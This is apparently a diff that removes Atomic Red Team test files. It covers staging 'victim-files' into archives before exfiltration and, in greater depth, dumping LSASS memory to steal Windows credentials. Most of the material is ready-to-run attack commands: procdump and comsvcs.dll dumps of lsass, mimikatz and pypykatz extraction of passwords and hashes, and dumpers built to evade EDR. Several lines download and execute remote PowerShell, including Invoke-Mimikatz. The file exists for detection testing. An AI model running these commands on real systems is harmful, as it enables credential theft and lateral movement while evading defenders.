- windows
input_arguments:
input_file:
description: Path that should be compressed into our output file
type: Path
default: "*.docx"
output_file:
description: Path where resulting compressed data should be placed
type: Path
default: exfilthis.rar
executor:
name: command_prompt
command: |
rar a -r #{output_file} #{input_file}
- name: Data Compressed - nix - zip
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_files:
description: Path that should be compressed into our output file, may include wildcards
type: Path
default: /tmp/victim-files/*
output_file:
description: Path that should be output as a zip archive
type: Path
default: /tmp/victim-files.zip
executor:
name: sh
command: |
zip #{output_file} #{input_files}
- name: Data Compressed - nix - gzip Single File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file:
description: Path that should be compressed
type: Path
default: /tmp/victim-gzip.txt
executor:
name: sh
command: |
gzip -f #{input_file}
- name: Data Compressed - nix - tar Folder or File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file_folder:
description: Path that should be compressed
type: Path
default: /tmp/victim-files/
output_file:
description: File that should be output
type: Path
default: /tmp/victim-files.tar.gz
executor:
name: sh
command: |
tar -cvzf #{output_file} #{input_file_folder}
atomics/T1003.001/T1003.001.md
-653
View File
@@ -1,653 +0,0 @@
# T1003.001 - OS Credential Dumping: LSASS Memory
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
<blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
Locally, mimikatz can be run using:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
Built-in Windows tools such as comsvcs.dll can also be used:
* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump)
- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump)
- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz)
- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
- [Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5](#atomic-test-11---dump-lsass-with-createdumpexe-from-net-v5)
- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
<br/>
## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Outflank-Dumpert.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{dumpert_exe}
```
#### Cleanup Commands:
```cmd
del C:\windows\temp\dumpert.dmp >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
```
<br/>
<br/>
## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
**Supported Platforms:** Windows
**auto_generated_guid:** dddd4aca-bbed-46f0-984d-e4c5971c51ea
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
```
#### Cleanup Commands:
```cmd
del "%temp%\nanodump.dmp" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
```
<br/>
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
<br/>
<br/>
## Atomic Test #6 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
**Supported Platforms:** Windows
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the Lsass dump | path | %tmp%&#92;lsass.DMP|
| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path #{mimikatz_exe} | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
```
##### Description: Lsass dump must exist at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
```
##### Get Prereq Commands:
```powershell
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
```
<br/>
<br/>
## Atomic Test #7 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live lsa
```
#### Dependencies: Run with `command_prompt`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```
<br/>
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
**Supported Platforms:** Windows
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder..&#92;ExternalPayloads&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
## Atomic Test #10 - Powershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** Windows
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
## Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
**Supported Platforms:** Windows
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
```
#### Cleanup Commands:
```powershell
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: .Net v5 must be installed
##### Check Prereq Commands:
```powershell
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
```
<br/>
<br/>
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xordump_exe | Path to xordump | path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
#{xordump_exe} -out #{output_file} -x 0x41
```
#### Cleanup Commands:
```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have xordump.exe
##### Check Prereq Commands:
```powershell
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
```
<br/>
atomics/T1003.001/T1003.001.yaml
-354
View File
@@ -1,354 +0,0 @@
attack_technique: T1003.001
display_name: "OS Credential Dumping: LSASS Memory"
atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
executor:
command: |
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using comsvcs.dll
auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
supported_platforms:
- windows
executor:
command: |
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
cleanup_command: |
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
supported_platforms:
- windows
input_arguments:
dumpert_exe:
description: Path of Dumpert executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe
dependency_executor_name: powershell
dependencies:
- description: |
Dumpert executable must exist on disk at specified location (#{dumpert_exe})
prereq_command: |
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
executor:
command: |
#{dumpert_exe}
cleanup_command: |
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using NanoDump
auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea
description: |
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
prereq_command: |
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
executor:
command: |
%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
cleanup_command: |
del "%temp%\nanodump.dmp" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
name: manual
- name: Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path of the Lsass dump
type: path
default: '%tmp%\lsass.DMP'
mimikatz_exe:
description: Path of the Mimikatz binary
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz must exist on disk at specified location (#{mimikatz_exe})
prereq_command: |
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path #{mimikatz_exe} | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
- description: |
Lsass dump must exist at specified location (#{input_file})
prereq_command: |
cmd /c "if not exist #{input_file} (exit /b 1)"
get_prereq_command: |
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
executor:
command: |
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
name: command_prompt
elevation_required: true
- name: LSASS read with pypykatz
auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8
description: |
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Computer must have pip installed
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "PIP must be installed manually"
- description: |
pypykatz must be installed and part of PATH
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
pip install pypykatz
executor:
command: |
pypykatz live lsa
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Out-Minidump.ps1
auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Create Mini Dump of LSASS.exe using ProcDump
